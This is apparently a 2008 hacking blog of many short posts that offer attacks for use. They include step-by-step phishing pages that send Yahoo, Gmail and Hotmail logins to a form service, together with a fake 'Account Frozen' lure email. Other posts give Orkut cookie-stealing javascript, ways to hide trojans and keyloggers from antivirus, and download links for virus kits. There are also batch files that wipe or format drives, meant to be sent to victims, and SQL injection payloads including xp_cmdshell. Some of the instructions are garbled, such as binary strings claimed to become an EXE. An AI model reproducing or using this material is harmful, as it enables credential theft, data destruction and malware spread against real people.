gmail, hack hotmail, hack msn, hack msn hotmail, hack yahoo, msn freezer on February 28, 2008 by
hacktocrack
In the previous version of “how to hack gmail or yahoo or hotmail or
any other” One problem faced was that whenever the victim clicks on
login a message would come saying “This page will send your
information through email” which could sometime fail your hack.But in
this new version this problem is eliminated and this is has become
more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the
registration form enter your email address in the field “Where to send
Data” and in redirect enter the URL of the site whose account is to be
hacked( For Yahoo it will be http://mail.yahoo.com and for google it is
mail.google.com/mail). After registering you will get an email from the
web form designer with your form id.Now follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want
to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press
“CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll find a code which
starts with <form method=“post” action=“https://login.yahoo.com/config/login?”
autocomplete=“off” name=“login_form”> ( This code is for Yahoo. For any other
site this code will be different but you need to find the code starting with (form
method=”post” action=”xxxxxxxxxxxxx”))
5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)

put the following code after placing your form id:

<form name=“New_Form”
action=“http://www.webformdesigner.net/wfd_f2.php?id=Your Form
ID Here” method=“post” enctype=“application/x-www-form-
urlencoded” onsubmit=“return New_Form_CF();”>

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login
through this page. Many people had sent me queries about how to
make someone login through your link in the previous version. I have
the solution for that also.
First of all upload your page using some free webhosting services.

Tip: Register to those webhost which don’t give their own ads and
which gives URL of type “your site name.webhost.com”. Now select
your site name as mail.yahoo.com/support.
You can also add some rubbish numbers and make is very long so that
the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s


email address with subject ” Account Frozen” and in the mail write that
Due to some technical errors in yahoo we need you to login through
this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you
created and as you have give the redirection URL as the URL of the
site itself so it will goto the login page again and the victim will think
that he might have given wrong password so the page came again but
in reallity the username and password has been sent to your email
account you specified and the victim is still not knowing that his
account is hacked. If you have your own ideas plz write it as comment
to this post. Your participation is always appreciated.

Good Luck !

93 Comments »

Fake Voice Changer


Posted in Download, Other with tags fake voice changer, free voice changer, full fake voice changer,
morph voice on February 27, 2008 by hacktocrack

Fake Voice is a voice changer software which changes your voice to male, female, old,
young, hard, shrill, or some one new. If you are female and want to sound like male or if
you are male and want to sound like male, this is your tool. You can apply robotic effect
to sound like alien or echo effect to sound like you speaking from a well or tunnel.
Whether you like you have fun with your friends or you want to improve your voice
quality for audio recording, this tool give you full control over your voice.

Download: 4.35 MB

http://rapidshare.com/files/85807298/1920FV.v1.0.8.rar

Mirror1:

http://w15.easy-share.com/15675441.html

Mirror2:

http://www.megaupload.com/?d=H0FMUQH8

Mirror3:

http://www.mediafire.com/?bmdzz5i0mht

Pass: www.dl4all.com

2 Comments »

Hack Orkut Accounts


Posted in Hardcore Hacking, Mozilla Firefox, Orkut, Website hacks, hacking with tags cookie snarf, hack
orkut, hack orkut accounts, hacking, orkut accounts on February 27, 2008 by hacktocrack

If This Doesn’t Work, Please Refer To The “Hot To Hack Gmail, Yahoo,
Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie and
one to advertise your script so that if orkut starts deleting such profiles
your real account wont be compromised…the choice is yours though..
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your
account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE


STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your


display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and
paste this script in his address bar and press enter. now you ll get his
cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).


3) Type orkut in the text box and click filter/refresh.look for
orkut_state cookie.

4) Just double click it and replace the orkut_state part with your
victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)

20 Comments »

How to make ALL


Trojan/Virus/Keylogger UNDETECTABLE
Posted in Hardcore Hacking, Virus, Viruses with tags undetectable virus, make trogan undetectable, make
virus, kelogger undetectable on February 26, 2008 by hacktocrack
This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be
found harmful, NOT. This tutorial explains how to make all files look %100 clean
(become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!!
ALL!!!!!)Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become
undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make
it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder
out there I know of, it makes everything %100 UNDETECTABLE BY ALL
ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the
program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll
recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.


3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell
to do, right? Well, this is what you do!
1. Download this pre-made settings. These settings are pre-made by me so you won’t be
confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:


Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the
projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same
location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows
will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to


Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!

„It takes a long time to learn simplicity.“

42 Comments »

Google - Peep Into Other’s Email Boxes


Posted in Email, Gmail, Google hacks, Website hacks, hacking with tags google hack, hack email on
February 25, 2008 by hacktocrack

The idea is, one Google advanced search string is filetype: . It is used to find out any file
only. Now I’m using this string as a tool,
I am searching for filetype:eml eml intext:”Content-Type: image/jpeg”.
Look at the keyword. It is finding a file with extension eml and that eml should have a
Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a
email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the
full keyword is searching for filename any with extension .eml which is email file
extension, and it should contain a .jpg file, may be some photo or other picture from the
web. You can’t belive if you are not checking it yourself.
Keyword : filetype:eml eml intext:”Content-Type: image/jpeg”

Here is ur example:

Click Here

Leave A Comment »

Hack Websites
Posted in Javascript/html Hacking, Password Hacking, hacking with tags hack website, hacking, hacking
websites, how to hack websites on February 25, 2008 by hacktocrack

NOTE: Works Only On Certian sites

If you have the html and javascript knowledge then you can access password protected
websites. So you want to know how??
keep reading…..
1. Open the website you want to hack. Provide wrong username-password in its log in
form.
(e.g : Username : me and Password: ‘ or 1=1 –)
An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here…
2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.
4. There you find somewhat like this….<_form action=”..login….”>
5. Before this login information copy the url of the site in which you are.
(e.g :”<_form……….action=http://www.targetwebsite.com/login…….>”)
6. Then delete the javascript from the above that validates your information in the
server.(Do this very carefully, ur success to hack the site depends upon this i.e how
efficiently you delete the javascripts that validate ur account information)
7. Then take a close look for “<_input name=”password” type=”password”>”[without
quotes] -> replace “<_type=text> ” there instead of “<_type=password>”. See there if
maxlength of password is less than 11 then increase it to 11 (e.g : if then write )
8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g:
c:chan.html)
9. Reopen your target web page by double clicking ‘chan.html’ file that you saved in your
harddisk earlier.
10. U see that some changes in current page as compared to original One. Don’t get
worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]
Congrats!!!!!! You have successfully cracked the above website and entered into the
account of Ist user saved in the server’s database.
*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without
quotes]
The above trick won’t work on the websites using latest technique to protect there
servers. Still you may find some websites to use this trick. Enjoy!!!!
WARNING: We post this trick just for your educational knowledge only. Don’t misuse it
other wise you will be in trouble. I take no responsibility of usage of the above trick]

6 Comments »

Secret Backdoor to Many Websites


Posted in Google hacks with tags forge googlebot, free hack, no credit card on February 25, 2008 by
hacktocrack

Ever experienced this? You ask Google to look something up; the engine returns with a
number of finds, but if you try to open the ones with the most promising content, you are
confronted with a registration page instead, and the stuff you were looking for will not be
revealed to you unless you agree to a credit card transaction first….
The lesson you should have learned here is: Obviously Google can go where you
can’t.Can we solve this problem? Yes, we can.
We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact,
many sites that force users to register or even pay in order to search and use their content,
leave a backdoor open for the Googlebot, because a prominent presence in Google
searches is known to generate sales leads, site hits and exposure.Examples of such sites
are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the
globe.How then, can you disguise yourself as a Googlebot? Quite simple:
by changing your browser’s User Agent.
Copy the following code segment and paste it into a fresh notepad file. Save it as
Useragent.reg and merge it into your registry.

*********************************************

Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet
Settings5.0User Agent]
@=”Googlebot/2.1″
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet
Settings5.0User Agent]
@=”Googlebot/2.1″
“Compatible”=”+http://www.googlebot.com/bot.html

***************************************************

Please Remove The Spaces Between CurrenVersion Internet Settings


“Voila! You’re done!You may always change it back again….
I know only one site that uses you User Agent to establish your eligability to use its
services, and that’s the Windows Update site…
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge
with your registry:

******************************************

Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet
Settings5.0User Agent]
@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

1 Comment »

Enable Right Clicks on The Sites That Disable it


Posted in Internet Explorer, Website hacks with tags enable right click on website, right click hack, website
hacking on February 25, 2008 by hacktocrack

Lots of web sites have disabled the right click function of the mouse button… it’s really,
really annoying.
This is done so that you don’t steal (via right-click->save picture) their photos or images
or any other goodies.
Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It’s easy to change, assuming your using IE 6:
Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll
down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple
of times. You’ll probably want to turn this back to “enable” when your done… ’cause
generally the javascript enhances a website

Leave A Comment »

IceCold Reloaded
Posted in Uncategorized with tags hack hotmail, hack msn, hack msn hotmail, msn freezer on February 25,
2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives
you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail
inbox. It includes support for the latest MSN Messenger Protocol.

NOTE - May Be Detected As A Trogan.HackerTool - It Is Not A Virus

Download Link:
http://rapidshare.com/files/46982035/Ice-Cold-Reloaded_msn-freezer_.zip.html

Leave A Comment »

Super Bluetooth Hack


Posted in Download, hacking, mobile on February 25, 2008 by hacktocrack

With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can:


read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone” it includes all call functions like hold etc.

Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of
the mobile .

Download: 111kb

http://rapidshare.com/files/69356389/SBH.v1.07.rar

Mirror1:

http://w13.easy-share.com/14502671.html
Mirror2:

http://www.megaupload.com/?d=R0SEV5PU
Mirror 3:

http://www.mediafire.com/?3wnbowtbmku

Pass: www.dl4all.com

43 Comments »

6000 Virus ready to use


Posted in Download, Virus, Viruses with tags crash computer, download virus, Virus on February 25, 2008
by hacktocrack

Here you go 6000 Virus ready to use

Sorry i did not want to write a list to many

after you exetracted the 6000 virus folder there is one more folder called
_DANGEROUS_ [DONT RUN ANY] that is holding them ..

THIS IS A WARNING DO NOT RUN ANY OF THE EXE FILES INSIDE FOLDER
_DANGEROUS_ [DONT RUN ANY] THERE AS YOU WILL AND MAY DAMAGE
YOUR SYSTEM

If you run one by mistake and f**** your PC don’t come to me going off you should
have been carefull when in folder _DANGEROUS_ {DONT RUN ANY}

- Download linkz

- > megaupload.com !
- > mediafire.com link !

17 Comments »

Hardcore Virus Makers


Posted in Download, Easy Hacking, Hardcore Hacking, Virus, Viruses with tags easy virus, hack virus,
make easy virus, virus maker on February 25, 2008 by hacktocrack

Download: http://www.megaupload.com/?d=6YPTOAXR
Mirror: http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html

Code: Select all


http://www.megaupload.com/?d=Y356K5W7
Code: Select all
http://jeyjey.persiangig.com/Download/JPSVM3.zip

How To Get Virus Off


You may have thought it was funny at first but that virus that you opened that was
supposed to be a joke doesnt go away very easily. If you restart your computer it will start
again. Heres what you do.

1. Go into processes and end the process csmm.exe


2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm
and delete it. Then you can restart your computer and the virus wont start again

5 Comments »

Send Fake Emails


Posted in Email, Hotmail, hacking with tags email hack, fake hacked email, hack email, hack hotmail
email, hack yahoo email on February 21, 2008 by hacktocrack

Always Wanted To Get Revenge On Someone?

Send A Fake Email Through Deadfake.com

Try It out!

2 Comments »

How to Hack Gmail or Yahoo or Hotmail or Any Other


(Old Version)
Posted in Gmail, Hotmail, Password Hacking, Yahoo, hacking with tags hack, hack gmail, hack hotmail,
hack msn, hack yahoo on February 21, 2008 by hacktocrack
There is a new version of this hack which is posted here. This version
is also completely working but the new version is better than this
one.There are different methods for Hacking Gmail or Yahoo or Orkut
or Any Other site. But this method is more popular because it can be
used to Hack any of the above sites just you need to make some
minute changes. Moreover you don’t require any software or anything
you can do it you using all the basic tools which present in a normal
computer. Just follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish.


If you want to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo
page. NOw press “CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll
find a code which starts with (form
action=”xxxxxxxxxxxxxxxxxxxxxxxxxxxxx”)
5. Delete the above code and paste the your id.
6. Now save the file. You can test whether its working or not. Just
open the yahoofake.html file and in the place of user name and
password, type some thing and sign in. you will get the
passwords in your mail id.. check out..
7. NOW UPLOAD the yahoofake.html page using GOOGLE PAGE
Creator or using www.50webs.com
8. After uploading you have to give the link to your friends, once
they sign in you ll get the passwords of your friends id.

33 Comments »

How to Format A HDD With Notepad


Posted in Notepad Tricks with tags format .bat, format hard drive, how to format, Notepad Tricks on
February 21, 2008 by hacktocrack
If you think that notepad is useless then you are wrong because you
can now do a lot of things with a notepad which you could have never
imagined.In this hack I will show you how to format a HDD using a
notepad. This is really cool.
Step 1.
Copy The Following In Notepad Exactly as it
says01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try


Laughing and u will get it Razz .. any way some more so u can test on
other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000
100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001

00100000011000110011101001011100011000100110111101
101111011101000010111001101001

0110111001101001

try to figure out urself rest


cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational
purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

1 Comment »
Hacks to Beat Rapidshare Download Limits and
Waiting Time
Posted in Rapidshare, Rapidshare Hacking with tags hack rapidshare, Rapidshare Hacking, rapidshare
leecher on February 20, 2008 by hacktocrack

Here are some hints to help you more efficently use rapidshare. Skipping
waiting time and bypassing download limits are rapidshare hacks that
everybody should know.

From www.Jamzezwebsite.webs.com

Here are some methods for doing this:

1. Short-Out the JavaScript:

1. Goto the page you want to download


2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File

2. Request a new IP address from your ISP server.

Here’s how to do it in windows:


1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new
line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

5. Erase your cookies in whatever browser you are using.


6. Try the rapidshare download again.

Frequently you will be assigned a new IP address when this happens. Sometime
you will, sometimes you will not. If you are on a fixed IP address, this method
will not work. To be honest, I do not know how to do this in linux/unix/etc. If this
works for you, you may want to save the above commands into a batch file, and
just run it when you need it.
3. Use a proxy with SwitchProxy and Firefox:

1. Download and install Firefox if you have not already


2. Download and install SwitchProxy
3. Google for free proxies
4. When you hit your download limit, clean your cookies and change your proxy

4. Use an anonymous service:

Running your system through the tor network should in theory work; however, it
is difficult to use and setup. Plus, you allow others to run their evil deeds through
your system as well by using this system. Anonymizer 2005 is inexpensive, easy
to use, but not free. Other pay services would likely work as well.

5. You can use a bookmarklet to stop your wait times:

1. Open IE
2. Right Click On This Link
3. Select Add to Favorites
4. Select Yes to the warning that the bookmark may be unsafe.
5. Name it “RapidShare No Wait”
6. Click on the Links folder (if you want to display it in your IE toolbar)
7. Click OK
8. You may need to close and reopen IE to see it
9. Goto rapidshare and click the bookmarklet when you are forced to wait

Leave A Comment »

SQL Injection

Hello fellow hackers . Today , I have brought another exploit for


you known as SQL Injection . So lets kick start the tutorial .

Vocabulary:

* SQL: Server Query Language-used in web applications to interact


with databases.
* SQL Injection: Method of exploiting a web application by supplying
user input designed to manipulate SQL database queries.
* "Injection": You enter the injections into an html form which is sent
to the web application. The application then puts you input directly into
a SQL query. In advertantly, this allows you to manipulate to query...

Prerequisite:

* A background of programming and a general idea of how most


hacking methods are done.

Application:

* Hacking a SQL database-driven server (usually only the ones that


use unparsed user input in database queries). There is still a surprising
number of data-driven web applications on the net that are vulnerable
to this type of exploit. Being as typical as all method, the frequency of
possible targets decreases over time as the method becomes more
known. This is one those exploits that aren't easily prevented by a
simple patch but by a competent programmer.

Use:
First, let's look at a typical SQL query:
SELECT fieldName1, fieldName2 FROM databaseName WHERE
restrictionsToFilterWhichEntriesToReturn

Now, to dissect...
The red areas is where criterion is inputed. The rest of the query
structures the query.

* SELECT fieldName1, fieldName2 - Specifies the of the names of


fields that will be returned from the database.
* FROM databaseName - Specifies the name of the database to search.
* WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which
entries to return.
Here is an example for somebody's login script:

SELECT userAcessFlags FROM userDatabase WHERE


userName="(input here)" AND userPass="(input here)"

The idea is guess what that application's query looks like and input
things designed to return data other than what was intended.

In the example, input like the following could give gain access to the
administrator account:

User: administrator
Pass: " OR ""="

Making the query like this:

SELECT userAcessFlags FROM userDatabase WHERE


userName="administrator" AND userPass="" OR ""=""

As you can see, ""="" (nothing does indeed match nothing)


Note: Injections are rarely as simple as this...

One can be creative and use error messages to your advantadge to


access other databases, fields, and entries. Learn a little SQL to use
things like UNION to merges query results with ones not intended.On
the security side, parse user data and get rid of any extra symbols
now that you know how it's done.

The idea in this example is to break out of the quotation marks.


When stuff is inside quotation marks, the stuff isn't processed as code
or anything but as a phrase and what it is.

The password injection was: " OR ""="


What this does is close the string that was started by the quotation
mark in the part userPass=". Once you break out, THEN stuff is
considered code. So, I put OR ""=" after I break out of the string. You
will notice that it is comparing two quotation marks with one, but the
quotation mark already built in by the application finishes it so we
have this:
userPass="" OR ""=""
Notice how the first and last quotation marks are not colored and are
not built in.

Additional notes:
This was just an extremely simplified version and you will probably
need to learn a little SQL to fully understand.

Here are a few SQL terms that do other things:


UNION: You use this to merge the results of one query with another.
You may put things like SELECT after UNION in order to search other
databases and stuff. Sometimes you may need to use ALL in
conjuction to break out of certain clauses. It does no harm so when in
doubt you could do something like:
" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE
userName="admin
The key when using UNION is to make your new query return the
same amount of columns in the same datatype so that you may get
the results you want.

:-- This works sometimes to terminate the query so that it ignores to


the rest of the stuff that might be fed afterwards if you don't like it.
For example:
SELECT * FROM userDatabase WHERE userName="admin";--" AND
userPass="aH0qcQOVz7e0s"

NOT IN: If you have no idea which record you want you could record
cycle (you request vague info, and you put what you already got in the
NOT IN clause so that you can get the next entry)
Usage:
SELECT userName userPass FROM userDatabase WHERE userName
NOT IN ('Dehstil','Twistedchaos')
EXEC: This command should never work, but if it does...you win; you
could do anything. For instance, you could inject something like this:
';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:

All my examples so far have dealt with read processes. To manipulate


a write process, here is an example for those who know what their
doing:
INSERT INTO userProfile VALUES(''+(SELECT userPass FROM
userDatabase WHERE userName='admin')+'' + 'Chicago' + 'male')
This example would theoretically put the admin's password in your
profile.